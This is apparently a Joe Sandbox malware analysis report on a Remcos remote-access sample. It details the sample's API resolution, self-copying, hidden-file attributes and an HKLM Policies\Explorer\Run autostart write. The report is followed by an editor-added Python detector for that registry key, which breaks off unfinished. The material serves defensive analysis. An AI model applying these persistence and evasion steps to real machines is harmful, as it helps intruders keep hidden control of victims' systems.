47037 40c96a 47033->47037 47038 40c8ed 47034->47038 47042 403b40 28 API calls 47036->47042 47041 403b40 28 API calls 47037->47041 47046 401e13 11 API calls 47038->47046 47039->47029 47040 403b40 28 API calls 47043 40ca27 47040->47043 47044 40c978 47041->47044 47045 40c926 47042->47045 47274 40cc37 28 API calls 47043->47274 47049 403b40 28 API calls 47044->47049 47050 403b40 28 API calls 47045->47050 47046->47039 47048 40ca3a 47275 402860 28 API calls 47048->47275 47053 40c98e 47049->47053 47054 40c93c 47050->47054 47052 40ca45 47276 402860 28 API calls 47052->47276 47273 402860 28 API calls 47053->47273 47272 402860 28 API calls 47054->47272 47058 40ca4f 47061 401e13 11 API calls 47058->47061 47059 40c999 47062 401e18 11 API calls 47059->47062 47060 40c947 47063 401e18 11 API calls 47060->47063 47064 40ca59 47061->47064 47065 40c9a4 47062->47065 47066 40c952 47063->47066 47067 401e13 11 API calls 47064->47067 47068 401e13 11 API calls 47065->47068 47069 401e13 11 API calls 47066->47069 47070 40ca62 47067->47070 47071 40c9ad 47068->47071 47072 40c95b 47069->47072 47073 401e13 11 API calls 47070->47073 47074 401e13 11 API calls 47071->47074 47075 401e13 11 API calls 47072->47075 47076 40ca6b 47073->47076 47074->47038 47075->47038 47077 401e13 11 API calls 47076->47077 47078 40ca74 47077->47078 47079 401e13 11 API calls 47078->47079 47080 40ca7d 47079->47080 47080->46738 47082 40bc7a _wcslen 47081->47082 47083 40bc84 47082->47083 47084 40bcce 47082->47084 47087 40bc8d CreateDirectoryW 47083->47087 47085 40c89e 31 API calls 47084->47085 47086 40bce0 47085->47086 47088 401e18 11 API calls 47086->47088 47278 40856b 47087->47278 47090 40bccc 47088->47090 47092 401e13 11 API calls 47090->47092 47091 40bca9 47312 4028cf 47091->47312 47097 40bcf7 47092->47097 47094 40bcb5 47095 401e18 11 API calls 47094->47095 47096 40bcc3 47095->47096 47098 401e13 11 API calls 47096->47098 47099 40bd10 47097->47099 47100 40bd2d 47097->47100 47098->47090 47103 40bb7b 31 API calls 
47099->47103 47101 40bd36 CopyFileW 47100->47101 47102 40be07 47101->47102 47105 40bd48 _wcslen 47101->47105 47284 40bb7b 47102->47284 47104 40bd21 47103->47104 47104->46745 47105->47102 47107 40bd64 47105->47107 47108 40bdb7 47105->47108 47110 40c89e 31 API calls 47107->47110 47109 40c89e 31 API calls 47108->47109 47113 40bdbd 47109->47113 47114 40bd6a 47110->47114 47111 40be4d 47112 40be95 CloseHandle 47111->47112 47117 403b40 28 API calls 47111->47117 47310 401e07 47112->47310 47118 401e18 11 API calls 47113->47118 47119 401e18 11 API calls 47114->47119 47115 40be18 47115->47111 47120 40be2a SetFileAttributesW 47115->47120 47122 40be63 47117->47122 47123 40bdb1 47118->47123 47124 40bd76 47119->47124 47134 40be39 _wcslen 47120->47134 47121 40beb1 ShellExecuteW 47125 40bec4 47121->47125 47126 40bece ExitProcess 47121->47126 47127 41ae18 28 API calls 47122->47127 47131 401e13 11 API calls 47123->47131 47128 401e13 11 API calls 47124->47128 47129 40bed7 CreateMutexA GetLastError 47125->47129 47130 40be76 47127->47130 47132 40bd7f 47128->47132 47129->47104 47315 412774 RegCreateKeyW 47130->47315 47135 40bdcf 47131->47135 47133 40856b 28 API calls 47132->47133 47136 40bd93 47133->47136 47134->47111 47137 40be4a SetFileAttributesW 47134->47137 47138 40bddb CreateDirectoryW 47135->47138 47139 4028cf 28 API calls 47136->47139 47137->47111 47141 401e07 47138->47141 47142 40bd9f 47139->47142 47144 40bdeb CopyFileW 47141->47144 47145 401e18 11 API calls 47142->47145 47144->47102 47147 40bdf8 47144->47147 47148 40bda8 47145->47148 47146 401e13 11 API calls 47146->47112 47147->47104 47149 401e13 11 API calls 47148->47149 47149->47123 47150->46630 47151->46640 47153->46664 47154->46693 47155->46686 47156->46677 47157->46691 47158->46751 47159->46770 47160->46731 47162 401f6e 47161->47162 47349 402301 47162->47349 47165->46750 47166->46756 47167->46763 47168->46773 47169->46781 47170->46792 47171->46798 47172->46806 47173->46828 47174->46841 47175->46816 47176->46821 
47177->46849 47178->46858 47179->46848 47180->46862 47181->46871 47182->46857 47353 419e99 104 API calls 47183->47353 47184->46684 47187 40e183 47186->47187 47188 41a66c LoadResource LockResource SizeofResource 47186->47188 47189 43a89c 47187->47189 47188->47187 47190 446b0f 47189->47190 47191 446b4d 47190->47191 47192 446b38 HeapAlloc 47190->47192 47197 446b21 _strftime 47190->47197 47206 445364 20 API calls __dosmaperr 47191->47206 47194 446b4b 47192->47194 47192->47197 47195 446b52 47194->47195 47195->46911 47197->47191 47197->47192 47205 442210 7 API calls 2 library calls 47197->47205 47199 401f8e 47198->47199 47207 402325 47199->47207 47201 401fa4 47201->46914 47203 401f86 28 API calls 47202->47203 47204 406066 47203->47204 47204->46921 47205->47197 47206->47195 47208 40232f 47207->47208 47210 40233a 47208->47210 47211 40294a 28 API calls 47208->47211 47210->47201 47211->47210 47213 40250d 47212->47213 47215 40252b 47213->47215 47216 40261a 28 API calls 47213->47216 47215->46925 47216->47215 47217->46946 47218->46946 47219->46935 47220->46927 47221->46950 47222->46954 47223->46956 47226 402e85 47225->47226 47227 402ea9 47226->47227 47228 402e98 47226->47228 47230 402eae 47226->47230 47227->46965 47232 403445 28 API calls 47228->47232 47230->47227 47233 40225b 11 API calls 47230->47233 47232->47227 47233->47227 47235 404bd0 47234->47235 47238 40245c 47235->47238 47237 404be4 47237->46968 47239 402469 47238->47239 47241 402478 47239->47241 47242 402ad3 28 API calls 47239->47242 47241->47237 47242->47241 47243->46972 47244->46975 47246 401e94 47245->47246 47248 41a481 47247->47248 47249 41b178 GetCurrentProcess 47247->47249 47250 412513 RegOpenKeyExA 47248->47250 47249->47248 47251 412541 RegQueryValueExA RegCloseKey 47250->47251 47252 412569 47250->47252 47251->47252 47253 401f66 28 API calls 47252->47253 47254 41257e 47253->47254 47254->46996 47255->47004 47257 40b02f 47256->47257 47260 40b04b 47257->47260 47259 40b045 47259->47015 47261 40b055 47260->47261 
47263 40b060 47261->47263 47264 40b138 28 API calls 47261->47264 47263->47259 47264->47263 47265->47019 47266->47022 47268 403b48 47267->47268 47277 403b7a 28 API calls 47268->47277 47270 403b5a 47270->47040 47271->47031 47272->47060 47273->47059 47274->47048 47275->47052 47276->47058 47277->47270 47279 408577 47278->47279 47321 402ca8 47279->47321 47283 4085a3 47283->47091 47285 40bba1 47284->47285 47286 40bbdd 47284->47286 47339 40b0dd 47285->47339 47287 40bc1e 47286->47287 47289 40b0dd 28 API calls 47286->47289 47290 40bc5f 47287->47290 47293 40b0dd 28 API calls 47287->47293 47292 40bbf4 47289->47292 47290->47115 47295 4028cf 28 API calls 47292->47295 47296 40bc35 47293->47296 47294 4028cf 28 API calls 47297 40bbbd 47294->47297 47298 40bbfe 47295->47298 47299 4028cf 28 API calls 47296->47299 47300 412774 14 API calls 47297->47300 47301 412774 14 API calls 47298->47301 47302 40bc3f 47299->47302 47303 40bbd1 47300->47303 47306 40bc12 47301->47306 47304 412774 14 API calls 47302->47304 47305 401e13 11 API calls 47303->47305 47307 40bc53 47304->47307 47305->47286 47308 401e13 11 API calls 47306->47308 47309 401e13 11 API calls 47307->47309 47308->47287 47309->47290 47311 401e0c 47310->47311 47345 402d8b 47312->47345 47314 4028dd 47314->47094 47316 4127c6 47315->47316 47319 412789 47315->47319 47317 401e13 11 API calls 47316->47317 47318 40be89 47317->47318 47318->47146 47320 4127a2 RegSetValueExW RegCloseKey 47319->47320 47320->47316 47322 402cb5 47321->47322 47323 402cc8 47322->47323 47325 402cd9 47322->47325 47326 402cde 47322->47326 47332 403374 28 API calls 47323->47332 47328 402de3 47325->47328 47326->47325 47333 402f21 11 API calls 47326->47333 47329 402daf 47328->47329 47334 4030f7 47329->47334 47331 402dcd 47331->47283 47332->47325 47333->47325 47335 403101 47334->47335 47337 403115 47335->47337 47338 4036c2 28 API calls 47335->47338 47337->47331 47338->47337 47340 40b0e9 47339->47340 47341 402ca8 28 API calls 47340->47341 47342 40b10c 47341->47342 47343 
402de3 28 API calls 47342->47343 47344 40b11f 47343->47344 47344->47294 47346 402d97 47345->47346 47347 4030f7 28 API calls 47346->47347 47348 402dab 47347->47348 47348->47314 47350 40230d 47349->47350 47351 402325 28 API calls 47350->47351 47352 401f80 47351->47352 47352->46744 47361 411637 62 API calls 47356->47361

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
• GetProcAddress.KERNEL32(00000000), ref: 0041BE73
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639

APIs
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
• Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
• Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000104), ref: 0040D790
• Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\iGhDjzEiDU.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
• API String ID: 2830904901-670684345


APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Users\user\Desktop\iGhDjzEiDU.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Users\user\Desktop\iGhDjzEiDU.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\user\Desktop\iGhDjzEiDU.exe$del$open$BG$BG
• API String ID: 1579085052-809517123

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
• Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
• Opcode Fuzzy Hash: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
• Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

Control-flow Graph

APIs
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-3211212173
• Opcode ID: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
• Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
• Opcode Fuzzy Hash: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
• Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

Control-flow Graph

control_flow_graph 652 446f53-446f6a GetLastError 653 446f6c-446f76 call 447476 652->653 654 446f78-446f7f call 448716 652->654 653->654 659 446fc9-446fd0 SetLastError 653->659 658 446f84-446f8a 654->658 660 446f95-446fa3 call 4474cc 658->660 661 446f8c 658->661 663 446fd2-446fd7 659->663 667 446fa5-446fa6 660->667 668 446fa8-446fbe call 446d41 call 446ad5 660->668 664 446f8d-446f93 call 446ad5 661->664 670 446fc0-446fc7 SetLastError 664->670 667->664 668->659 668->670 670->663
APIs
• GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
• _free.LIBCMT ref: 00446F8D
• _free.LIBCMT ref: 00446FB4
• SetLastError.KERNEL32(00000000), ref: 00446FC1
• SetLastError.KERNEL32(00000000), ref: 00446FCA
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
• Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F

Control-flow Graph

control_flow_graph 675 412774-412787 RegCreateKeyW 676 4127c6 675->676 677 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 675->677 678 4127c8-4127d4 call 401e13 676->678 677->678
APIs
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
• RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 1818849710-1051519024
• Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
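
The RegCreateKeyW / RegSetValueExW pair in this function writes an autostart value under HKEY_LOCAL_MACHINE (the 80000002 handle in the first argument) at Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run. That is a policy-driven autorun location which Sysinternals Autoruns enumerates but which gets far less attention than the plain CurrentVersion\Run key; a write there needs elevated rights and fires for every user at logon. The Python below is an example added by the editor, not code from the report or from the analysed sample. It shows the check a detection engineer would run over endpoint telemetry: it parses constructed, SIEM-style Sysmon Event ID 13 (RegistryEvent: Value Set) records and flags any value set under that key, in HKLM or in a per-user HKU hive (the report only shows the HKLM write; covering HKU is a generalisation). The event layout, the value names and the dropped-file path are constructed for illustration; only the Desktop image path is taken from the report.

```python
"""Flag autostart values written to ...\\Policies\\Explorer\\Run.

Added example; not part of the Joe Sandbox report or the analysed sample.
Input is a constructed SIEM-style flattening of Sysmon Event ID 13 records:
one record per line, 'Field=value' pairs joined by '|'.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sample telemetry (not real events). Only the Desktop image path
# in the first record comes from the report; every other name is made up.
SAMPLE_EVENTS = [
    # Value set under HKLM by the analysed sample: should be flagged.
    # Sysmon exports the key's default value as "(Default)".
    r"EventID=13|Image=C:\Users\user\Desktop\iGhDjzEiDU.exe"
    r"|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\(Default)"
    r"|Details=C:\Users\user\AppData\Roaming\updater.exe",
    # Key creation (Event ID 12) for the same key carries no data: ignored.
    r"EventID=12|Image=C:\Users\user\Desktop\iGhDjzEiDU.exe"
    r"|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    # Same technique in a per-user hive, exported with the SID: should be flagged.
    r"EventID=13|Image=C:\Temp\dropper.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updater"
    r"|Details=C:\Temp\dropper.exe",
    # Ordinary Run key write: outside this rule's scope, not flagged.
    r"EventID=13|Image=C:\Program Files\Example\setup.exe"
    r"|TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Example"
    r"|Details=C:\Program Files\Example\example.exe",
]

# Key path with the hive already split off. Case-insensitive, because the
# registry is case-insensitive and exports use either spelling of SOFTWARE.
POLICIES_RUN_RE = re.compile(
    r"^Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)

# Exported hive spellings mapped to canonical names.
HIVE_ALIASES = {
    "HKLM": "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE": "HKEY_LOCAL_MACHINE",
    "HKCU": "HKEY_CURRENT_USER", "HKEY_CURRENT_USER": "HKEY_CURRENT_USER",
    "HKU": "HKEY_USERS", "HKEY_USERS": "HKEY_USERS",
}


@dataclass(frozen=True)
class Finding:
    hive: str
    value_name: str
    image: str   # process that performed the write
    data: str    # command line / path stored in the value


def parse_event(line: str) -> dict:
    """Split 'Field=value|Field=value' into a dict; values may contain '='."""
    return dict(pair.split("=", 1) for pair in line.split("|") if "=" in pair)


def split_hive(target: str) -> Tuple[str, str]:
    """Return (canonical hive, key path below it); HKU\\<SID>\\... collapses to HKEY_USERS."""
    hive, _, rest = target.partition("\\")
    canonical = HIVE_ALIASES.get(hive.upper(), hive.upper())
    if canonical == "HKEY_USERS":
        # Drop the SID component so the per-user path matches the same regex.
        _sid, _, rest = rest.partition("\\")
    return canonical, rest


def check_event(line: str) -> Optional[Finding]:
    """Return a Finding if the record sets a value under Policies\\Explorer\\Run."""
    ev = parse_event(line)
    if ev.get("EventID") != "13":   # only value-set events carry the written data
        return None
    hive, key = split_hive(ev.get("TargetObject", ""))
    m = POLICIES_RUN_RE.match(key)
    if m is None:
        return None
    return Finding(hive, m.group("value"), ev.get("Image", ""), ev.get("Details", ""))


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run check_event over every record and keep the hits."""
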